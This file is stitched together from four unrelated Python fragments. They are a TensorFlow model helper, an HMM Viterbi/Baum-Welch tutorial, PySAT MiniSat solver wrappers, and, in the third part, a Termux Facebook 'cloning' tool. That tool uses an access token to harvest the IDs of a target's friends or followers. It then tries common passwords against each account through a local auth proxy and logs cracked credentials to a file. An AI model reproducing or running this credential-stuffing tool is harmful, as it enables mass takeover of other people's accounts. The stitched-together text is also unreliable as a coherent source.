raise ValueError("If running in training, must specify following outputs: %s" %(', '.join(needed_args)))
return
def __verbose_print(self, model, model_name, input_shape, opt, loss, metrics):
print("".join(["\n", "*" * 100, "\nModel Details\n", "*" * 100, "\n"]))
print(f"Model Name: {model_name}")
print(f"Optimizer Details: name = {opt.get_config()['name']}, learning rate = {opt.get_config()['learning_rate']}")
print(f"Loss Details: name = {loss.get_config()['name']}, from_logits = {loss.get_config()['from_logits']}")
print(f"Input Shape: {tuple(input_shape)}")
print(f"Metrics: {"".join(metrics)}")
print("*" * 100)
print(model.summary())
print("*" * 100, "\n")
return
######################################################
### Public Methods
######################################################
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
### Sample Model
#/////////////////////////////////////////////////////
#\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
def get_sample_model(self, input_shape = (386, 1024, 26), gpu_device = "/gpu:0", verbose = True):
r"""Returns the sample model for QnA Span Annotation task.
Adapter pooler layer inspired by Houlsby et al. 2019 : https://arxiv.org/abs/1902.00751v2
Args:
input_shape (tuple, optional): Shape of the input tensor. Defaults to (386, 1024, 26).
gpu_device (str, optional): If GPU devices are available, defines which one to utilize. Defaults to "/gpu:0".
verbose (bool, optional): Log details to console. Defaults to True.
Returns:
tf.keras.Model: returns a TensorFlow 2.2 model (compiled, untrained)
"""
# Input validation
| |
<reponame>lonelycorn/machine-learning
import numpy as np
"""
Discrete hidden states x[k] with
* Time-independent stochastic state transition matrix
* Time-independent stochastic observation matrix
* Initial state distribution
Goal: given a sequence of measurements, estimate most likely
* transition matrix
* observation matrix
* initial state distribution
* sequence of state
Note: it's not uncommon to find the recovered sequence different from the ground
truth, which is due to overfitting
ref: https://www.ece.ucsb.edu/Faculty/Rabiner/ece259/Reprints/tutorial%20on%20hmm%20and%20applications.pdf
"""
def drawSample(cumulativeProbability):
M = len(cumulativeProbability)
p = np.random.sample() # between [0, 1)
for i in range(M):
if (cumulativeProbability[i] >= p):
return i
return M - 1
def generateGroundTruthSequence(N, transitionProbability, firstStateProbability):
"""
:param N: number of samples to generate
:param transitionProbability: M-by-M matrix. each row gives probability to transit to other states
:return groundTruthSequence
"""
M = len(transitionProbability)
cumulativeProbability = np.cumsum(transitionProbability, axis=1)
#print("cumulative transition probability")
#print(cumulativeProbability)
groundTruthSequence = np.zeros(N, dtype=int)
k = drawSample(np.cumsum(firstStateProbability))
groundTruthSequence[0] = k
for i in range(1, N):
k = drawSample(cumulativeProbability[k, :])
groundTruthSequence[i] = k
return groundTruthSequence
def generateMeasurements(groundTruthSequence, observationProbability):
"""
:param observationProbability: M-by-M matrix
:return measurements
"""
cumulativeProbability = np.cumsum(observationProbability, axis=1)
#print("cumulative observation probability")
#print(cumulativeProbability)
measurements = [drawSample(cumulativeProbability[k, :]) for k in groundTruthSequence]
return np.array(measurements)
def computeTransitionLikelihood(sequence, M):
N = len(sequence)
count = np.zeros((M, M), dtype=int)
for i in range(N - 1):
t = sequence[i]
s = sequence[i + 1]
count[t, s] += 1
print("transition count")
print(count)
likelihood = np.zeros(count.shape, float)
for i in range(M):
d = np.sum(count[i, :])
# to avoid division-by-0
if (d > 0):
likelihood[i, :] = count[i, :] / d
return likelihood
def computeObservationLikelihood(sequence, measurements, M):
assert(len(sequence) == len(measurements))
N = len(sequence)
count = np.zeros((M, M), dtype=int)
for (s, z) in zip(sequence, measurements):
count[s, z] += 1
print("observation count")
print(count)
likelihood = np.zeros(count.shape, float)
for i in range(M):
d = np.sum(count[i, :])
# to avoid division-by-0
if (d > 0):
likelihood[i, :] = count[i, :] / d
return likelihood
def findMostLikelySequence(transitionProbability, observationProbability, firstStateProbability, measurements):
"""
Viterbi algorithm
:return (mostLikelySequence, logLikelihood)
"""
assert(transitionProbability.shape == observationProbability.shape)
assert(len(transitionProbability) == len(firstStateProbability))
N = len(measurements)
M = len(transitionProbability)
# When T and O are fixed & given
# P(z[0] ... z[k-1], z[k], x[0] ... x[k-1], x[k])
# = P(z[k] | z[0] ... z[k-1], x[0] ... x[k-1], x[k]) *
# P(x[k] | z[0] ... z[k-1], x[0] ... x[k-1]) *
# P(z[0] ... z[k-1], x[0] ... x[k-1])
# = P(z[k] | x[k]) * P(x[k] | x[k-1]) * P(z[0] ... z[k-1], x[0] ... x[k-1])
#
# The last step originates from the Markov property, which suggests that z[k]
# depends only on x[k], and x[k] is determined solely by x[k-1]
#
# Let
# F[k, s] = log(P(z[0] ... z[k-1], z[k], x[0] ... x[k-1], x[k]=s))
# T[k, t, s] = log(P(x[k]=s | x[k-1]=t))
# O[k, s, r] = log(P(z[k]=r | x[k]=s))
# Note we could drop index k from T and O because these two matrices do NOT
# change over time
#
# Then we have
# F[0, s] = log(firstStateProbability[s]) + O[s, z[0]]
# F[k, s] = max_t { O[s, z[k]] + T[t, s] + F[k-1, t] }
T = np.log(transitionProbability)
O = np.log(observationProbability)
F = np.zeros((N, M), dtype=float)
prev = np.zeros(F.shape, dtype=int) # assignment of x[k-1] that maximizes F[k, s]
z = measurements
for s in range(M):
F[0, s] = O[s, z[0]] + np.log(firstStateProbability[s])
prev[0, s] = -1
#print(f"k = 0, F[k, :] = {np.exp(F[0, :])}")
for k in range(1, N):
for s in range(M): # current state
best = -np.inf
idx = -1
for t in range(M): # previous state
proposal = O[s, z[k]] + T[t, s] + F[k - 1, t]
if (proposal > best):
best = proposal
idx = t
#print(f"k = {k}, t = {t}, s = {s}, z = {z[k]}, value = {np.exp(proposal)}")
# NOTE: sometimes idx < 0 because state s at step k is infeasible; when
# this happens, we'll leave F[k, s] = -inf, and prev[k, s] = -1
F[k, s] = best
prev[k, s] = idx
#print(f"k = {k}, F[k, :] = {np.exp(F[k, :])}")
#print(f"F\n{F}")
#print(f"prev\n{prev}")
# recover most likely sequence
mostLikelySequence = np.zeros(N, dtype=int)
s = np.argmax(F[N - 1, :])
mostLikelySequence[N - 1] = s
logLikelihood = F[N-1, s]
for k in range(N - 1, 0, -1):
s = prev[k, s]
mostLikelySequence[k - 1] = s
return (mostLikelySequence, logLikelihood)
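# End-to-end usage sketch (hedged; T, O and pi are small example parameters):
#   T = np.array([[0.9, 0.1], [0.2, 0.8]])   # state transition probabilities
#   O = np.array([[0.8, 0.2], [0.3, 0.7]])   # observation probabilities
#   pi = np.array([0.5, 0.5])                # initial state distribution
#   x = generateGroundTruthSequence(100, T, pi)
#   z = generateMeasurements(x, O)
#   seq, logL = findMostLikelySequence(T, O, pi, z)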
def findMostLikelyParameters(measurements,
M,
transitionLikelihood=None,
observationLikelihood=None,
firstStateLikelihood=None):
"""
Baum-Welch (EM) algorithm
Estimate the most likely parameters given the measurements using the Baum-Welch (EM) algorithm
:return transitionLikelihood, observationLikelihood, firstStateLikelihood
"""
EPSILON = 1e-4
INITIAL_OBSERVATION_ERROR_RATE = 0.3
def perturbLikelihood(likelihood, epsilon=EPSILON):
M = len(likelihood)
return likelihood * (1.0 - epsilon) + np.ones(likelihood.shape) * epsilon / M
N = len(measurements)
# initialization
if (transitionLikelihood is None):
transitionLikelihood = computeTransitionLikelihood(measurements, M)
if (observationLikelihood is None):
observationLikelihood = perturbLikelihood(np.eye(M), epsilon=INITIAL_OBSERVATION_ERROR_RATE)
if (firstStateLikelihood is None):
firstStateLikelihood = np.array([np.sum(measurements == i) for i in range(M)]) / N
print(f"initial transition likelihood\n{transitionLikelihood}")
print(f"initial observation likelihood\n{observationLikelihood}")
print(f"initial likelihood\n{firstStateLikelihood}")
count = 0
prevLogLikelihood = 0
while (True):
count += 1
T = transitionLikelihood
O = observationLikelihood
pi = firstStateLikelihood
z = measurements
# Let X = {x[0] ... x[N-1]} denote the trajectory of the hidden states, and
# Z = {z[0] ... z[N-1]} all available measurements
#
# Let lambda = {T; O; pi} represent all model parameters, where
# T[i, s, t] = Pr(x[i+1] == t | x[i] == s)
# O[i, s, t] = Pr(z[i] == t | x[i] == s)
# pi[s] = Pr(x[0] == s)
# Note that index i could be dropped from O and T because both state transition
# probability and observation probability are time-invariant
#
# The joint distribution of hidden state at step i, and all measurements
# P(x[i], z[0] ... z[N-1] | lambda)
# = P(z[i+1] ... z[N-1] | x[i], z[0] ... z[i], lambda) * P(x[i], z[0] ... z[i] | lambda)
#
# From the HMM factor graph, it could be seen that future observations are
# conditionally independent of past observations, given the current hidden
# state, i.e.
# P(z[i+1] ... z[N-1] | x[i], z[0] ... z[i], lambda) = P(z[i+1] ... z[N-1] | x[i], lambda)
#
# With the above line, the original joint distribution could be simplified to
# P(x[i], z[0] ... z[N-1] | lambda)
# = P(z[i+1] ... z[N-1] | x[i], lambda) * P(x[i], z[0] ... z[i] | lambda)
#
# Define
# alpha[i, s] = Pr(x[i]=s, z[0] ... z[i] | lambda)
# beta[i, s] = Pr(z[i+1] ... z[N-1] | x[i]=s, lambda)
#
# We could compute alpha and beta by induction as follows
# alpha[0, s] = pi[s] * O[s, z[0]]
# alpha[i, s] = sum(alpha[i-1, t] * T[t, s]) * O[s, z[i]]
# beta[N-1, s] = 1
# beta[i, s] = sum(beta[i+1, t] * T[s, t] * O[t, z[i+1]]
#
# The probability of being in a specific state at step i, given all measurements and
# all model parameters could then be written using alpha and beta as
# gamma[i, s] = Pr(x[i]=s | z[0] ... z[N-1], lambda)
# = Pr(x[i]=s, z[0] ... z[N-1], lambda) / Pr(z[0] ... z[N-1] | lambda)
# = Pr(z[i+1] ... z[N-1] | x[i]=s, lambda) * Pr(x[i]=s, z[0] ... z[i] | lambda) / Pr(z[0] ... z[N-1] | lambda)
# = alpha[i, s] * beta[i, s] / sum(alpha[i, t] * beta[i, t])
#
# The probability of transiting from one state to another at step i, given all
# measurements and all model parameters is
# ksi[i, s, t] = Pr(x[i]=s, x[i+1]=t | z[0] ... z[N-1], lambda)
# = Pr(x[i]=s, x[i+1]=t, z[0] ... z[N-1] | lambda) / Pr(z[0] ... z[N-1] | lambda)
# = Pr(z[i+2] ... z[N-1] | x[i]=s, x[i+1]=t, z[0] ... z[i+1], lambda) *
# Pr(z[i+1] | x[i]=s, x[i+1]=t, z[0] ... z[i], lambda) *
# Pr(x[i+1]=t | x[i]=s, z[0] ... z[i], lambda) *
# Pr(x[i]=s, z[0] ... z[i] | lambda) /
# Pr(z[0] ... z[N-1] | lambda)
# = Pr(z[i+2] ... z[N-1] | x[i+1]=t, lambda) *
# Pr(z[i+1] | x[i+1]=t) *
# Pr(x[i+1]=t | x[i]=s) *
| |
<reponame>fiazkhan420/khan
#!/usr/bin/python2
# coding=utf-8
import os
import sys
import time
import datetime
import re
import threading
import json
import random
import requests
import hashlib
import cookielib
import uuid
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
__author__ = 'Mr-Robot'
__copyright__ = 'All rights reserved. Copyright Mr-Robot'
os.system('termux-setup-storage')
try:
os.mkdir('/sdcard/ids')
except OSError:
pass
bd = random.randint(2e+07, 3e+07)
sim = random.randint(20000, 40000)
header = {
'x-fb-connection-bandwidth': repr(bd),
'x-fb-sim-hni': repr(sim),
'x-fb-net-hni': repr(sim),
'x-fb-connection-quality': 'EXCELLENT',
'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA',
'user-agent': 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]',
'content-type': 'application/x-www-form-urlencoded',
'x-fb-http-engine': 'Liger' }
os.system('git pull')
os.system('clear')
#### colours ####
B='\033[1;94m'
R='\033[1;91m'
G='\033[1;92m'
W='\033[1;97m'
S='\033[1;96m'
P='\033[1;95m'
Y='\033[1;93m'
#Dev:<NAME>
#### LOGO ####
logo = """
\033[1;97m ****************"*****************
\033[1;96m *███╗░░░███╗██████╗░░██████╗░ *F*
\033[1;95m *████╗░████║██╔══██╗██╔════╝░ *A*
\033[1;94m *██╔████╔██║██████╔╝██║░░██╗░ *M*
\033[1;93m *██║╚██╔╝██║██╔═══╝░██║░░╚██╗ *I*
\033[1;92m *██║░╚═╝░██║██║░░░░░╚██████╔╝ *L*
\033[1;91m *╚═╝░░░░░╚═╝╚═╝░░░░░░╚═════╝░ *Y*
\033[1;92m 🄱🅁🄰🄽🄳
\033[1;97m **********************************
\033[1;93m SCRIPT MAKER : XTY<NAME>
\033[1;96m GANG OWNER : <NAME>
\033[1;95m NOTE : ONLY FOR GANG
\033[1;94m BE ORIGINAL LETS THE WORLD COPY U
\033[1;97m *********************************
"""
def reg():
os.system('clear')
print logo
print ''
print '\033[1;31;1mTake The Free Approval For Login'
print ''
time.sleep(1)
try:
to = open('/sdcard/.hst.txt', 'r').read()
except (KeyError, IOError):
reg2()
r = requests.get('https://raw.githubusercontent.com/pathani404/MPG/main/mpg.txt').text
if to in r:
os.system('cd ..... && npm install')
os.system('fuser -k 5000/tcp &')
os.system('#')
os.system('cd ..... && node index.js &')
time.sleep(2)
ip()
else:
os.system('clear')
print logo
print '\tApproval Failed'
print ' \033[1;92mYour id is not approved yet '
print ' \033[1;92mCopy the id and send to admin'
print ' \033[1;92mYour id: ' + to
raw_input('\033[1;93m Press enter to send id')
os.system('xdg-open https://wa.me/+923414547149')
reg()
def reg2():
os.system('clear')
print logo
print '\tApproval not detected'
print ' \033[1;92mCopy the id and send it on WhatsApp to continue'
id = uuid.uuid4().hex[:50]
print ' Your id: ' + id
print ''
raw_input(' Press enter to go to Whatsapp ')
os.system('xdg-open https://wa.me/+923414547149')
sav = open('/sdcard/.hst.txt', 'w')
sav.write(id)
sav.close()
raw_input('\033[1;92m Press enter to check Approval ')
reg()
def ip():
os.system('clear')
print logo
print '\tCollecting device info'
try:
ipinfo = requests.get('http://ip-api.com/json/')
z = json.loads(ipinfo.text)
ips = z['query']
country = z['country']
regi = z['regionName']
network = z['isp']
except:
pass
print '\033[1;92m Your ip: ' + ips
time.sleep(2)
print '\033[1;92m Your country: ' + country
time.sleep(2)
print '\033[1;92m Your region: ' + regi
time.sleep(2)
print ' \033[1;92mYour network: ' + network
time.sleep(2)
print ' Loading ...'
time.sleep(2)
log_menu()
def log_menu():
try:
t_check = open('access_token.txt', 'r')
menu()
except (KeyError, IOError):
os.system('clear')
print logo
print '\033[1;90m *********Login menu*********\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Login with FaceBook'
print '\033[1;92m[2] Login with token'
print '\033[1;92m[3] MPG Brand'
print ''
log_menu_s()
def log_menu_s():
s = raw_input(' \033[1;97m╰─MPG➤ ')
if s == '1':
log_fb()
elif s == '2':
log_token()
elif s == '3':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
else:
print ''
print '\tSelect valid option '
print ''
log_menu_s()
def log_fb():
os.system('clear')
print logo
print '\033[1;31;1mLogin with id/pass'
print 47 * '-'
lid = raw_input('\033[1;92m Id/mail/no: ')
pwds = raw_input(' \033[1;93mPassword: ')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + <PASSWORD>).text
q = json.loads(data)
if 'loc' in q:
ts = open('access_token.txt', 'w')
ts.write(q['loc'])
ts.close()
menu()
elif 'www.facebook.com' in q['error']:
print ' User must verify account before login'
raw_input('\033[1;92m Press enter to try again ')
log_fb()
else:
print ' Id/Pass may be wrong'
raw_input(' \033[1;92mPress enter to try again ')
log_fb()
except:
print ''
print 'Exiting tool'
os.system('exit')
def log_token():
os.system('clear')
print logo
print '\033[1;93mLogin with token\033[1;91m'
print 47 * '-'
tok = raw_input(' \033[1;92mPaste token here: \033[1;91m')
print 47 * '-'
t_s = open('access_token.txt', 'w')
t_s.write(tok)
t_s.close()
menu()
def menu():
os.system('clear')
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
print ''
print logo
print '\033[1;31;1mLogin FB id to continue'
time.sleep(1)
log_menu()
try:
r = requests.get('https://graph.facebook.com/me?access_token=' + token)
q = json.loads(r.text)
z = q['name']
except (KeyError, IOError):
print logo
print ''
print '\t Account Checkpoint\x1b[0;97m'
print ''
os.system('rm -rf access_token.txt')
time.sleep(1)
log_menu()
except requests.exceptions.ConnectionError:
print logo
print ''
print '\t Turn on mobile data/wifi\x1b[0;97m'
print ''
raw_input(' \033[1;92mPress enter after turning on mobile data/wifi ')
menu()
os.system('clear')
print logo
tok = open('/sdcard/.hst.txt', 'r').read()
print ' \033[1;92mLogged in user: \033[1;94m' + z
print 47 * '-'
print ' \033[1;90m Active token: \033[1;94m' + tok
print ' ------------------------------------------ '
print '\033[1;92m[1] Start Cloning'
print '\033[1;92m[2] Follow MPG OWNER'
print '\033[1;92m[3] View token'
print '\033[1;92m[4] Logout'
print '\033[1;92m[5] Delete trash files'
menu_s()
def menu_s():
ms = raw_input('\033[1;97m╰─MPG➤ ')
if ms == '1':
auto_crack()
elif ms == '2':
os.system('xdg-open https://facebook.com/quyyam.jafar/')
elif ms == '3':
v_tok()
elif ms == '4':
lout()
elif ms == '5':
rtrash()
else:
print ''
print '\tSelect valid option'
print ''
menu_s()
def crack():
global toket
try:
toket=open('login.txt','r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t File Not Found \x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def auto_crack():
global token
try:
token = open('access_token.txt', 'r').read()
except (KeyError, IOError):
os.system('clear')
print logo
print '\t Login FB id to continue\x1b[0;97m'
print ''
time.sleep(1)
log_menu()
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice pass cracking ~~~~\033[1;94m'
print 47 * '-'
print '\033[1;92m[1] Public id cloning'
print '\033[1;92m[2] Followers cloning'
print '\033[1;92m[3] File cloning'
print '\033[1;92m[0] Back'
a_s()
def a_s():
id = []
cps = []
oks = []
a_s = raw_input(' \033[1;97m╰─MPG➤ ')
if a_s == '1':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~Choice public cracking~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input(' \033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/friends?access_token=' + token)
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '2':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
idt = raw_input(' \033[1;93m[★]Enter id: ')
try:
r = requests.get('https://graph.facebook.com/' + idt + '?access_token=' + token)
q = json.loads(r.text)
z = q['name']
os.system('clear')
print logo
print '\033[1;90m~~~~ Choice followers cracking ~~~~'
print ' \033[1;92mCloning from: ' + z
except (KeyError, IOError):
print '\t Invalid user \x1b[0;97m'
raw_input('\033[1;92mPress enter to try again ')
auto_crack()
r = requests.get('https://graph.facebook.com/' + idt + '/subscribers?access_token=' + token + '&limit=999999')
z = json.loads(r.text)
for i in z['data']:
uid = i['id']
na = i['name']
nm = na.rsplit(' ')[0]
id.append(uid + '|' + nm)
elif a_s == '3':
os.system('clear')
print logo
print ' \033[1;90mFor-example : \033[1;97m234567,334455,445566,556677\033[1;94m'
print 47 * '-'
pass1 = raw_input(' \033[1;92m[1]Password: ')
pass2 = raw_input(' \033[1;92m[2]Password: ')
pass3 = raw_input(' \033[1;92m[3]Password: ')
pass4 = raw_input(' \033[1;92m[4]Password: ')
try:
idlist= raw_input('[+] File Name: ')
for line in open(idlist ,'r').readlines():
id.append(line.strip())
except IOError:
print"[!] File Not Found."
raw_input('Press Enter To Back. ')
crack()
elif a_s == '0':
menu()
else:
print ''
print '\tChoose valid option' + W
a_s()
print ' Total ids: ' + str(len(id))
time.sleep(0.5)
print ' \033[1;92mCrack Running\033[1;94m '
time.sleep(0.5)
print 47 * '-'
print '\t\033[1;95mITz MPG BRAND \033[1;94m'
print 47 * '-'
def main(arg):
user = arg
(uid, name) = user.split('|')
try:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass1, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass1
ok = open('/sdcard/ids/MRP_OK.txt', 'a')
ok.write(uid + ' | ' + pass1 + '\n')
ok.close()
oks.append(uid + pass1)
elif 'www.facebook.com' in q['error']:
print '\033[1;97m[MPG-CP]➤ ' + uid + ' | ' + pass1
cp = open('MRP_CP.txt', 'a')
cp.write(uid + ' | ' + pass1 + '\n')
cp.close()
cps.append(uid + pass1)
else:
data = requests.get('http://localhost:5000/auth?id=' + uid + '&pass=' + pass2, headers = header).text
q = json.loads(data)
if 'loc' in q:
print '\033[1;92m[MPG-OK]➤ ' + uid + ' | ' + pass2
ok
| |
def nof_clauses(self):
"""
Get number of clauses currently used by the solver.
"""
if self.minicard:
return pysolvers.minicard_nof_cls(self.minicard)
def accum_stats(self):
"""
Get accumulated low-level stats from the solver. This includes
the number of restarts, conflicts, decisions and propagations.
"""
if self.minicard:
return pysolvers.minicard_acc_stats(self.minicard)
def enum_models(self, assumptions=[]):
"""
Iterate over models of the internal formula.
"""
if self.minicard:
done = False
while not done:
self.status = self.solve(assumptions=assumptions)
model = self.get_model()
if model is not None:
self.add_clause([-l for l in model]) # blocking model
yield model
else:
done = True
def add_clause(self, clause, no_return=True):
"""
Add a new clause to solver's internal formula.
"""
if self.minicard:
res = pysolvers.minicard_add_cl(self.minicard, clause)
if res == False:
self.status = False
if not no_return:
return res
def add_atmost(self, lits, k, no_return=True):
"""
Add a new atmost constraint to solver's internal formula.
"""
if self.minicard:
res = pysolvers.minicard_add_am(self.minicard, lits, k)
if res == False:
self.status = False
if not no_return:
return res
def append_formula(self, formula, no_return=True):
"""
Appends list of clauses to solver's internal formula.
"""
if self.minicard:
res = None
# this loop should work for a list of clauses, CNF, and CNFPlus
for clause in formula:
if len(clause) != 2 or isinstance(clause[0], int): # it is a clause
res = self.add_clause(clause, no_return)
else:
res = self.add_atmost(clause[0], clause[1], no_return)
if not no_return and res == False:
return res
if not no_return:
return res
def supports_atmost(self):
"""
This method can be called to determine whether the solver supports
native AtMostK (see :mod:`pysat.card`) constraints.
"""
return True
#
#==============================================================================
class Minisat22(object):
"""
MiniSat 2.2 SAT solver.
"""
def __init__(self, bootstrap_with=None, use_timer=False):
"""
Basic constructor.
"""
self.minisat = None
self.status = None
self.new(bootstrap_with, use_timer)
def __enter__(self):
"""
'with' constructor.
"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""
'with' destructor.
"""
self.delete()
self.minisat = None
def new(self, bootstrap_with=None, use_timer=False):
"""
Actual constructor of the solver.
"""
if not self.minisat:
self.minisat = pysolvers.minisat22_new()
if bootstrap_with:
if type(bootstrap_with) == CNFPlus and bootstrap_with.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in bootstrap_with:
self.add_clause(clause)
self.use_timer = use_timer
self.call_time = 0.0 # time spent for the last call to oracle
self.accu_time = 0.0 # time accumulated for all calls to oracle
def delete(self):
"""
Destructor.
"""
if self.minisat:
pysolvers.minisat22_del(self.minisat)
self.minisat = None
def solve(self, assumptions=[]):
"""
Solve internal formula.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisat22_solve(self.minisat, assumptions,
int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def solve_limited(self, assumptions=[], expect_interrupt=False):
"""
Solve internal formula using given budgets for conflicts and
propagations.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
self.status = pysolvers.minisat22_solve_lim(self.minisat,
assumptions, int(MainThread.check()), int(expect_interrupt))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return self.status
def conf_budget(self, budget):
"""
Set limit on the number of conflicts.
"""
if self.minisat:
pysolvers.minisat22_cbudget(self.minisat, budget)
def prop_budget(self, budget):
"""
Set limit on the number of propagations.
"""
if self.minisat:
pysolvers.minisat22_pbudget(self.minisat, budget)
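# Usage sketch (hedged): set budgets before calling solve_limited(), which
# is expected to return None when a budget is exhausted without a verdict:
#   s.conf_budget(1000)    # at most 1000 conflicts
#   s.prop_budget(10**6)   # at most one million propagations
#   status = s.solve_limited()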
def interrupt(self):
"""
Interrupt solver execution.
"""
if self.minisat:
pysolvers.minisat22_interrupt(self.minisat)
def clear_interrupt(self):
"""
Clears an interruption.
"""
if self.minisat:
pysolvers.minisat22_clearint(self.minisat)
def propagate(self, assumptions=[], phase_saving=0):
"""
Propagate a given set of assumption literals.
"""
if self.minisat:
if self.use_timer:
start_time = process_time()
st, props = pysolvers.minisat22_propagate(self.minisat,
assumptions, phase_saving, int(MainThread.check()))
if self.use_timer:
self.call_time = process_time() - start_time
self.accu_time += self.call_time
return bool(st), props if props != None else []
def set_phases(self, literals=[]):
"""
Sets polarities of a given list of variables.
"""
if self.minisat:
pysolvers.minisat22_setphases(self.minisat, literals)
def get_status(self):
"""
Returns solver's status.
"""
if self.minisat:
return self.status
def get_model(self):
"""
Get a model if the formula was previously satisfied.
"""
if self.minisat and self.status == True:
model = pysolvers.minisat22_model(self.minisat)
return model if model != None else []
def get_activity(self):
"""
Get variable activity scores from the solver.
"""
if self.minisat:
activity = pysolvers.minisat22_activity(self.minisat)
return activity
def get_activity_bump(self):
"""
Get the activity bump increment used by the solver.
"""
if self.minisat:
activity = pysolvers.minisat22_activity_bump(self.minisat)
return activity
def get_core(self):
"""
Get an unsatisfiable core if the formula was previously
unsatisfied.
"""
if self.minisat and self.status == False:
return pysolvers.minisat22_core(self.minisat)
def get_proof(self):
"""
Get a proof produced while deciding the formula.
"""
raise NotImplementedError('Proof tracing is not supported by MiniSat.')
def time(self):
"""
Get time spent for the last call to oracle.
"""
if self.minisat:
return self.call_time
def time_accum(self):
"""
Get time accumulated for all calls to oracle.
"""
if self.minisat:
return self.accu_time
def nof_vars(self):
"""
Get number of variables currently used by the solver.
"""
if self.minisat:
return pysolvers.minisat22_nof_vars(self.minisat)
def nof_clauses(self):
"""
Get number of clauses currently used by the solver.
"""
if self.minisat:
return pysolvers.minisat22_nof_cls(self.minisat)
def accum_stats(self):
"""
Get accumulated low-level stats from the solver. This includes
the number of restarts, conflicts, decisions and propagations.
"""
if self.minisat:
return pysolvers.minisat22_acc_stats(self.minisat)
def enum_models(self, assumptions=[]):
"""
Iterate over models of the internal formula.
"""
if self.minisat:
done = False
while not done:
self.status = self.solve(assumptions=assumptions)
model = self.get_model()
if model is not None:
self.add_clause([-l for l in model]) # blocking model
yield model
else:
done = True
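# Usage sketch (hedged): enumeration adds blocking clauses to the solver's
# formula, so enumerate on a throwaway instance:
#   with Minisat22(bootstrap_with=[[1, 2]]) as s:
#       for model in s.enum_models():
#           print(model)
# Since complete assignments are blocked, the number of models can be
# exponential in the number of variables.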
def add_clause(self, clause, no_return=True):
"""
Add a new clause to solver's internal formula.
"""
if self.minisat:
res = pysolvers.minisat22_add_cl(self.minisat, clause)
if res == False:
self.status = False
if not no_return:
return res
def add_atmost(self, lits, k, no_return=True):
"""
Atmost constraints are not supported by MiniSat.
"""
raise NotImplementedError('Atmost constraints are not supported by MiniSat.')
def append_formula(self, formula, no_return=True):
"""
Appends list of clauses to solver's internal formula.
"""
if self.minisat:
res = None
if type(formula) == CNFPlus and formula.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in formula:
res = self.add_clause(clause, no_return)
if not no_return and res == False:
return res
if not no_return:
return res
def supports_atmost(self):
"""
This method can be called to determine whether the solver supports
native AtMostK (see :mod:`pysat.card`) constraints.
"""
return False
#
#==============================================================================
class MinisatGH(object):
"""
MiniSat SAT solver (version from github).
"""
def __init__(self, bootstrap_with=None, use_timer=False):
"""
Basic constructor.
"""
self.minisat = None
self.status = None
self.new(bootstrap_with, use_timer)
def __enter__(self):
"""
'with' constructor.
"""
return self
def __exit__(self, exc_type, exc_value, traceback):
"""
'with' destructor.
"""
self.delete()
self.minisat = None
def new(self, bootstrap_with=None, use_timer=False):
"""
Actual constructor of the solver.
"""
if not self.minisat:
self.minisat = pysolvers.minisatgh_new()
if bootstrap_with:
if type(bootstrap_with) == CNFPlus and bootstrap_with.atmosts:
raise NotImplementedError('Atmost constraints are not supported by MiniSat')
for clause in bootstrap_with:
self.add_clause(clause)
self.use_timer = use_timer
self.call_time = 0.0 # time spent for the last call to oracle
self.accu_time = 0.0 # time accumulated for all calls to oracle
def delete(self):
"""
Destructor.
"""
if self.minisat:
pysolvers.minisatgh_del(self.minisat)
self.minisat = None
